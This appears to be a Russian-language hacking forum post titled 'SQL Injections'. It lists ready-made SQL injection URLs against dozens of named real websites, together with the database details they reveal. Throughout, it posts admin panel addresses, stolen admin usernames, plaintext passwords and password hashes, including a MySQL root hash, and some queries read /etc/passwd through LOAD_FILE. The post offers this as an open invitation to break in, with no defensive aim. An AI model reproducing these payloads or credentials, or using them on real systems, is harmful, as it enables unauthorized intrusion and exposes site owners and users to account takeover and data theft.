SQL Инъекции

<<Доска объявлений>>

Code:

http://www.infoboard.reporter-studio.ru/idv.php?id=-7947'+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+

db: 5.0.51a-community-nt-log
name_db: 1gb_reporter4
user: [email protected]
http://www.infoboard.reporter-studio.ru/admin/

log: admin
pass: 374982



<<Империя Курсовых>>

Code:

http://www.kursovic.ru/showdoc.php?id=-100022+union+select+version()--+

db: 4.0.27
name_db: kursovic
user: [email protected]

<<Продукция.НТЦ"Кардея">>

Code:

http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,unhex(hex(version())),3,4,5--+

db: 4.1.16-nt
name_db: kardeya
user: kardeya@localhost

 

Blind SQL-inj

http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+ascii(lower(substring(запрос,1,1)))=значение

version: 5.0.37
database: assoc_web
user: assocweb@localhost

 

Code:

http://www.frso.be/blog.php?bid=10%27+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12+limit+1,1/*

version():5.0.45
database():frso
user():frso@localhost
___

Code:

http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+limit+1,1/*

version():4.1.22-standard-log
database():joodscultuurfestival
user():[email protected]

Code:

http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1,1
/*

Code:

http://www.joodscultuurfestival.be/admin/

id:loginassword
1:lev:b59c67bf196a4758191e42f76670ceba = 1111

 

<<Строительство в Москве>>

Code:

http://www.mos-stroi.ru/cats.php?id=-94600+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+

db: 5.0.67-community
name_db: ruprom_ruprom
user: ruprom@localhost

 

Code:

http://www.donorinfo.be/fiche.php?ProjectID=126+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+limit+1,1/*

version():4.1.22-standard-log
database():donorinfo
user():[email protected]
_

Code:

http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6,7,8,9,10+limit+1,1

version():5.0.67-community-log
database():kbpkrgxq_BBAntwerp
user():kbpkrgxq_wolf@localhost

Code:

http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(email,0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10+from+users+limit+1,1

Code:

http://www.gastenkamersantwerpen.be/cms/index.php

loginass:email
admin:asimov:[email protected]

 

<<Денис Колисниченко. Документация по Linux и PHP. Linux-сервер своими руками>>

Code:

http://www.dkws.org.ua/index.php?page=fcat&id=-12+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--

db: 5.1.30
name_db: dkwsorgu_team
user: dkwsorgu_team@localhost
http://www.dkws.org.ua/admin/ - у кого плохо настроения, заходите.....

table: phpbb_users
log: Bear
pass: 270576
+limit+1x1-- - и все юзверы как на ладоне.



<<Клуб деловой информации "Санкт Питербург">>

Code:

http://www.stpeteclub.ru/news/new.php?id=-287+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4--+

db: 4.0.27-log
name_db: new
user: new@localhost
http://www.stpeteclub.ru/admin/

log: adm2in
pass: re4hb5wf

 

Code:

http://sascha.loeffler.gs/downloadwahl.php?id=-12+union+select+1,concat_ws(0x20,user(),database(),version()),3,4,5--

version():5.0.32-Debian_7etch8-log
database():sascha
user():sascha@localhost

 

http://promcomplekt.com/products/view.php?pid=1075+union+select+1+limit+1,1/*

Database Version: 5.0.24-standard
Database name: db_promcomplekt1
User name: promcomplekt1@localhost

 

http://www.crackdb.com/get.php?id=-1%27+union+select+1,2,Password,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+--+

http://www.rdholding.ru/get.php?id=-1+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764,4,5,6,7,8+--+

http://www.nfodb.com/get.php?id=-1%27+union+select+1,2,3,4,5,LOAD_FILE(%27/etc/passwd%27),7,8,9,10,11,12,13,14,15,16,17,18,19+from+files+--+

http://www.hackzone.us/forum/?a=open&fid=1&id=-1+union+select+11,1,10,9,table_name,7,6,5,4,3,2+from+information_schema.tables+limit+35,1+--+

 

http://www.tusculumpioneers.com/sport.php?id=-10+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x61),0x61),4,5,6,7,8,9,10,11,12+--+

 

<<ГК Международный институт менеджмента>>

Code:

http://www.gkmim.ru/index.php?area=table&shose=-1'+union+select+1,concat_ws(0x20,version(),database(),user())--+

db: 5.0.76
name_db: gkmim
user: gkmim@localhost
http://www.gkmim.ru/admin/


table: phpbb_users
log: gkmim-admin
pas: 991c1e56f1c6e0c03c72bf95611194de
users:
log: Марина
pas: 123
+limit+x,x--+

 

Code:

http://s1701.zouo.ru/site.php?id=-34+union+select+unhex(hex(version())),2,3--+

db: 4.1.16-nt
name_db: s1701
user: s1701@localhost
http://s1701.zouo.ru/manager/

table: phpbb_users

log: nachalka
pas: 1701nachalka

 

Target: www.cbc.bb

Evil link: http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,version(),user(),5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

version: 4.0.27-standard-log
user: csite28@AdServNode1
database: csite28_CPSG

Читаем локальные файлы:
http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

 

Code:

http://www.audepp.org/boxSeccion.php?id=106+and+substring(version(),1,1)=4

Code:

http://www.photos-gallery.net/subcategory.php?id=-1012+union+select+version()--

Code:

http://www.sai.org.uy/website/iframes/novedad_ampliada.php?id=-44+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

 

Database Version: 5.0.22
Database name: ccaabelem
User name: [email protected]



Администраторы

id_admin : nome : logina : senhaa : privilegios

:1 : Eugenio Augusto : guto :fgjasd : 1
:2 : Max:max : 34513451 : 2
:5 : douglas : douglas : 32451242:4
:4 : FABRIZIO : fabrizio rado:1
:8 : polyanna : polyanna :2341234:4

Version: 4.0.27-locaweb-log
User: [email protected]
Database: ceci_br1

 

Code:

http://www.bmwstyle.ru/bmw.php?id=-138+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8--+

db:5.0.67-0ubuntu6
name_db: www_bmwstyle_ru
user: bmwstyle@localhost

log: Admin
pass: admin123

 

innovations-forum-rodgau.de

Code:

http://www.innovations-forum-rodgau.de/memberinfo.php?id=-1+union+all+select+0,convert(version()+using+latin1),convert(database()+using+latin1),3,convert(user()+using+latin1),5,6,7,8,9,10,11,12,13,14--

юзер/версия/бд:

Code:

ifr@localhost:4.1.11-Debian_4sarge7-log:ifr_db

---------------------------------------------------------------------------------
The End!

 

Code:

http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11

version():5.0.51a-3ubuntu5.4-log
database():loonenmsql1
user():loonenmsql1@localhost

Code:

http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,2,3,4,5,6,7,8,9,10,11+from+user

__

Code:

http://www.dromedaris.nl/link.php?id=1267+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6+limit+1,1/*

version():4.1.20-log
database():dromedaris
user():dromed@localhost
__

Code:

http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*

version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost

Code:

http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex(concat(email,0x3a,password))),8,9,10,11,12,13,14,15,16,17,18,19+from+scriptorium_users+limit+1,1/*

[email protected]:1ed8b85b1aee78c5

Code:

http://scriptorium.serve-it.nl/login.php

___

Code:

http://www.dho.nl/index.php?mid=2+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16+limit+1,1

version():5.0.51a-24-log
database():dho_nl
user():[email protected]
__

Code:

http://www.brusselsmuseums.be/en/brusscard/participants.php?mid=25+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*

version():5.0.32-Debian_7etch8
database():bmuseum
user()ointbe@localhost
__

Code:

http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+limit+1,1

version():4.1.22-standard-log
database():joodscultuurfestival
user():[email protected]

Code:

http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1,1/*

1:lev:b59c67bf196a4758191e42f76670ceba

Code:

http://www.joodscultuurfestival.be/admin/

___

Code:

http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+limit+1,1/*

version():5.0.27
database():IIHE
user():root@localhost

Code:

http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*

root:710789ba2a55b808

 

http://www.shipfinance.bm/index.php?id=462+AND+SUBSTRING((y() ),1,1)=x-- &pressrelease=1273904.html

y1=version
y2=database
y3=user

x=Version : 5.1.31-community
Database : OFR_shipfinance1208
User : shipfinance1208@localhost

 

Code:

http://www.bildstein-bueros.de/www/startnext/pop.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--

юзер/версия/бд:

Code:

4.0.15-log:dom2671@localhost:dom2671